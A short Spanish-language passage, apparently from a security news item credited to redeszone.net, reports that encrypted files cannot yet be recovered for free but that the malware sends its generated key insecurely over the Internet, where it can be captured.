Aunque por el momento no existe una herramienta que permita recuperar los archivos de forma gratuita, los expertos han detectado que la clave generada se envía de forma no segura a través de Internet, pudiéndose capturar sin ningún tipo de problema.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática